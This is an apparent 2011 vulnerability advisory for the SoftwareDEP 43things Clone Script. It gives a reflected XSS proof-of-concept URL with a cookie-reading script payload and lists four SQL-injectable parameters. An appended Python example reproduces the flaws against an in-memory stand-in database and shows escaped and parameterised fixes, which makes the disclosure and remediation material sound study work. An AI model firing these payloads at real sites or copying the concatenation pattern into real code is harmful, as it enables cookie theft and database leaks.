-----------------------------------------------------------------------
SoftwareDEP 43things Clone Script Multiple Vulnerabilities
 
Author     : v3n0m
Discovered : August 18, 2011 (GMT+7, Jakarta, Indonesia)
Software   : 43things Clone script
Developer  : http://www.softwaredep.com/
Price      : $700
Version    : v2 (lower versions may also be affected)
-----------------------------------------------------------------------

PoC:
---

XSS Injection:
-------------
http://www.domain.tld/[path]/zeitgeist/tag_list.php?tag=<script>alert(document.cookie)</script>

SQL Injection:
-------------
http://www.domain.tld/[path]/thing_detail.php?thingid=[SQLi]
http://www.domain.tld/[path]/thingshome.php?uid=[SQLi]
http://www.domain.tld/[path]/recent_activity.php?uid=[SQLi]
http://www.domain.tld/[path]/year_in_review.php?uid=[SQLi]
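Added example (not part of the advisory and not SoftwareDEP's code): a small
Python script covering both PoC sections above. It builds the percent-encoded
form of the tag_list.php XSS URL, classifies whether a response reflects the
payload raw or entity-encoded, and places a hypothetical string-concatenation
handler for thing_detail.php (written to match the behaviour the advisory
reports; the real script's source is not on this page) beside a hardened one.
The database is a constructed in-memory SQLite table standing in for the
script's own tables, and "1 OR 1=1" is a generic illustrative tautology, not a
payload taken from the advisory.

```python
import html
import re
import sqlite3
from urllib.parse import quote

# The reflected-XSS payload from the advisory's tag_list.php PoC.
XSS_PAYLOAD = "<script>alert(document.cookie)</script>"


def poc_url(script_url: str, param: str, payload: str) -> str:
    """Build the PoC URL with the payload percent-encoded, so that '<', '>'
    and parentheses survive the trip through a browser or curl unchanged."""
    return f"{script_url}?{param}={quote(payload, safe='')}"


def reflection_status(body: str, payload: str = XSS_PAYLOAD) -> str:
    """Classify how a response body reflects the payload:
    'unescaped' (vulnerable), 'escaped' (entity-encoded, safe) or 'absent'."""
    if payload in body:
        return "unescaped"
    if html.escape(payload, quote=True) in body:
        return "escaped"
    return "absent"


# Hypothetical tag_list.php handler matching the advisory's reported behaviour.
def vulnerable_tag_list(params: dict) -> str:
    tag = params.get("tag", "")
    return f"<h1>Things tagged '{tag}'</h1>"


def hardened_tag_list(params: dict) -> str:
    # Entity-encode on output, for the HTML-text context the value lands in.
    tag = html.escape(params.get("tag", ""), quote=True)
    return f"<h1>Things tagged '{tag}'</h1>"


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the script's database: a tiny things table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE things (thingid INTEGER PRIMARY KEY, uid INTEGER, title TEXT)"
    )
    conn.executemany(
        "INSERT INTO things VALUES (?, ?, ?)",
        [(1, 10, "learn to cook"), (2, 11, "run a marathon")],
    )
    return conn


# Hypothetical thing_detail.php handler with the concatenation pattern that
# produces the advisory's thingid=[SQLi] condition.
def vulnerable_thing_detail(conn: sqlite3.Connection, params: dict) -> list:
    thingid = params.get("thingid", "")
    sql = "SELECT title FROM things WHERE thingid = " + thingid
    return [row[0] for row in conn.execute(sql)]


def thingid_accepted(raw: str) -> bool:
    """Whitelist check: an id is 1-10 decimal digits and nothing else."""
    return re.fullmatch(r"[0-9]{1,10}", raw) is not None


def hardened_thing_detail(conn: sqlite3.Connection, params: dict) -> list:
    raw = params.get("thingid", "")
    # Validate the shape first, then bind the value as a query parameter.
    if not thingid_accepted(raw):
        raise ValueError("thingid must be a positive integer")
    rows = conn.execute("SELECT title FROM things WHERE thingid = ?", (int(raw),))
    return [row[0] for row in rows]


if __name__ == "__main__":
    print(poc_url("http://www.domain.tld/[path]/zeitgeist/tag_list.php", "tag", XSS_PAYLOAD))
    print(reflection_status(vulnerable_tag_list({"tag": XSS_PAYLOAD})))  # unescaped
    print(reflection_status(hardened_tag_list({"tag": XSS_PAYLOAD})))    # escaped
    db = build_db()
    print(vulnerable_thing_detail(db, {"thingid": "1 OR 1=1"}))  # every row leaks
    try:
        hardened_thing_detail(db, {"thingid": "1 OR 1=1"})
    except ValueError as err:
        print("rejected:", err)
```

The same whitelist-then-bind pattern applies to the uid parameter of
thingshome.php, recent_activity.php and year_in_review.php; reflection_status
is the offline half of a verification check, to be run over the body returned
by the PoC URL on a copy of the site you are authorised to test.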

Credits:
-------
www.yogyacarderlink.web.id - irc.yogyacarderlink.web.id